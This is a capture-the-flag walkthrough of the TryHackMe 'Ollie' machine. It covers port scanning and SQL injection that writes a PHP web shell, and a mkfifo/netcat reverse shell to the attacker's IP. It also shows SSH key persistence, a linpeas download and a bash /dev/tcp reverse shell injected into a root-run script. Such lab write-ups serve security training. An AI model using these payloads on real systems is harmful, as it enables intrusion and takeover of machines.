Ollie (SQLI, Permission)
First, we need to enumerate using nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie
╰─➤ nmap -A 10.10.20.38 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-16 14:50 +0630
Nmap scan report for 10.10.20.38
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /immaolllieeboyyy
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Ollie :: login
|_Requested resource was http://10.10.20.38/index.php?page=login
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.78 secondsRustscan result show me all open ports.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie
╰─➤ rustscan -a 10.10.20.38 | tee rust.log
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
1337/tcp open waste syn-ackWhen i answer random question on port 1337, i got some credentials.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie
╰─➤ nc 10.10.20.38 1337
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
What is your name? mrhnl
What's up, Mrhnl! It's been a while. What are you here for? getsystem
Ya' know what? Mrhnl. If you can answer a question about me, I might have something for you.
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? duck
You are wrong! I'm sorry, but this is serious business. Let's try again...
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? wolf
You are wrong! I'm sorry, but this is serious business. Let's try again...
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
Please hold on a minute
Ok, I'm back.
After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.
Username: admin
Password: OllieUnixMontgomery!
PS: Good luck and next time bring some treats!When I login using this creds on http://10.10.20.38, I successfully login.
After this, we will see the admin dashboard.
Here is the article for poc https://fluidattacks.com/advisories/mercury/. You can read ubuntu version through SQLI.
Check if user have read or write access. You will see all is Y.
" union all select 1,2,3,group_concat(user,0x3a,file_priv) from mysql.user -- -Write evil php on the system. We got error, it is still ok.
" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/rev.php' -- -We can check our RCE is success or not?
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie
╰─➤ curl http://10.10.20.38/rev.php\?cmd\=whoami
1 www-data
3 4Get a shell from victim using mkfifo.
curl http://10.10.20.38/rev.php\?cmd\=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.9.0.180%209001%20%3E%2Ftmp%2FfIn netcat session, we got reverse shell.
We found user.txt on /home/ollie. The only one we got is permission error.
$ cat user.txt
cat: user.txt: Permission deniedWe can move to ollie user, with the password that we seen in previous task.
$ su ollie
Password: OllieUnixMontgomery!
whoami
ollieWhich stable shell, we generate ssh key and write on victim.
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHmsE/qACwaksUEoBvDE4wFu0/N5eZeNQEX9upOp8Bh4KTZsUcMqo7OSdztZbvkSwwp0S6C3mk9WLioJbQ2dDFC64ZyT/LUAgNZgZkSRZtufQa9lhUgqNYhg/0oT1juH5rGTJhoGa8MROpRhp/LiKXw8g4wOQggrG+xqrnCG84PCcb0bq73XW7XMYN9koLXokwl3GSlX/AkSn3VWgBcnj73IX2eI2yvYSAzckYyWeu9fR6EX/j8Rfj3Z7Tsy0W4iuhHwSGPJHX8yDms9Sx07nQmMGGKW+RmQ6p1dqDt9g/R1L2aXDJLJnZOGzR4ZqdxFpyl3R/R026HXKyeSCSAvaE34GIzBowe6g9K4h/Ewe3zwIBlLW8TGq7L7EBPR2j6d2yYSbniH3GMio88N+vmF4E919gMMlgMqi4fJOhoy/l++4vuBqKAEpGEcywblNLw4YSe59dSBurrFeTNrC3O6CNyO8GyDtQ3wxNOGI7nMe7yOesabNTdz9qDRXdbpyXDwE= hnl@hnl" > /home/ollie/.ssh/authorized_keysLet's login ssh using private key.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie
╰─➤ ssh -i /home/hnl/.ssh/id_rsa ollie@10.10.20.38
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-99-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 16 Apr 2022 09:45:56 AM UTC
System load: 0.45 Processes: 141
Usage of /: 64.4% of 9.78GB Users logged in: 0
Memory usage: 45% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for eth0: 10.10.20.38
6 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Feb 12 15:57:44 2022
ollie@hackerdog:~$ Nothing is interesting. So, we will check using pspy64, linpeas.
wget http://10.9.0.180:1234/linpeasWe can see suspicious process like feedme.
2022/04/16 10:00:00 CMD: UID=0 PID=73809 | /lib/systemd/systemd-udevd
2022/04/16 10:00:00 CMD: UID=0 PID=73808 | /lib/systemd/systemd-udevd
2022/04/16 10:00:39 CMD: UID=0 PID=73812 | ps -e -o pid,ppid,state,command
2022/04/16 10:01:01 CMD: UID=0 PID=73814 | /lib/systemd/systemd-udevd
2022/04/16 10:01:01 CMD: UID=0 PID=73813 | (feedme)
2022/04/16 10:01:01 CMD: UID=0 PID=73824 | /lib/systemd/systemd-udevd
2022/04/16 10:01:01 CMD: UID=0 PID=73823 | /lib/systemd/systemd-udevdFind this file.
ollie@hackerdog:/tmp$ find / -type f -name feedme 2>/dev/null
/usr/bin/feedme
ollie@hackerdog:/tmp$ cat /usr/bin/feedme
#!/bin/bash
# This is weird?Who own this file?
ollie@hackerdog:/tmp$ ls -lisha /usr/bin/feedme
10256 4.0K -rwxrw-r-- 1 root ollie 30 Feb 12 02:31 /usr/bin/feedmeInject it.
ollie@hackerdog:/tmp$ echo "bash -i >& /dev/tcp/10.9.0.180/9002 0>&1" >> /usr/bin/feedme
ollie@hackerdog:/tmp$ cat /usr/bin/feedme
#!/bin/bash
# This is weird?
bash -i >& /dev/tcp/10.9.0.180/9002 0>&1In netcat session, we got reverse shell.
Last updated
Was this helpful?